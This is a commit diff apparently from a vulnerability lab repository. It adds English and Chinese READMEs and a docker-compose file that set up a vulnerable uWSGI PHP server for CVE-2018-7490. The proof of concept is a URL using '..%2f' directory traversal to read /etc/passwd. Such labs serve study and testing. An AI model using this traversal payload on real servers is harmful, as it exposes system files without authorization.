first commit

uwsgi/CVE-2018-7490/README.md

@@ -0,0 +1,24 @@
+
+# uWSGI PHP Directory Traversal Vulnerability (CVE-2018-7490)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+uWSGI is a web application server, which implements protocols such as WSGI/uwsgi/http, and supports for various languages through plugins.
+
+The PHP plugin of uWSGI before 2.0.17 doesn't handle the detection of `DOCUMENT_ROOT` correctly, resulting in reading or running files outside the `DOCUMENT_ROOT` through the use of `..%2f`.
+
+## Environment Setup
+
+Enter the following command：
+
+```
+docker compose up -d
+```
+
+Visit `http://your-ip:8080` and you'll see the phpinfo page as the uwsgi-php server running successfully.
+
+## POC
+
+Directly visit `http://your-ip:8080/..%2f..%2f..%2f..%2f..%2fetc/passwd`, you will get the passwd file：
+
+![](1.png)

uwsgi/CVE-2018-7490/README.zh-cn.md

@@ -0,0 +1,21 @@
+# uWSGI PHP目录穿越漏洞（CVE-2018-7490）
+
+uWSGI是一款Web应用程序服务器，它实现了WSGI、uwsgi和http等协议，并支持通过插件来运行各种语言。
+
+uWSGI 2.0.17之前的PHP插件，没有正确的处理`DOCUMENT_ROOT`检测，导致用户可以通过`..%2f`来跨越目录，读取或运行`DOCUMENT_ROOT`目录以外的文件。
+
+## 漏洞环境
+
+运行存在漏洞的uWSGI服务器：
+
+```
+docker compose up -d
+```
+
+运行完成后，访问`http://your-ip:8080/`即可看到phpinfo信息，说明uwsgi-php服务器已成功运行。
+
+## 漏洞复现
+
+访问`http://your-ip:8080/..%2f..%2f..%2f..%2f..%2fetc/passwd`，成功读取文件：
+
+![](1.png)

uwsgi/CVE-2018-7490/docker-compose.yml

@@ -0,0 +1,6 @@
+version: '2'
+services:
+ web:
+   image: vulhub/uwsgi-php:2.0.16
+   ports:
+    - "8080:8080"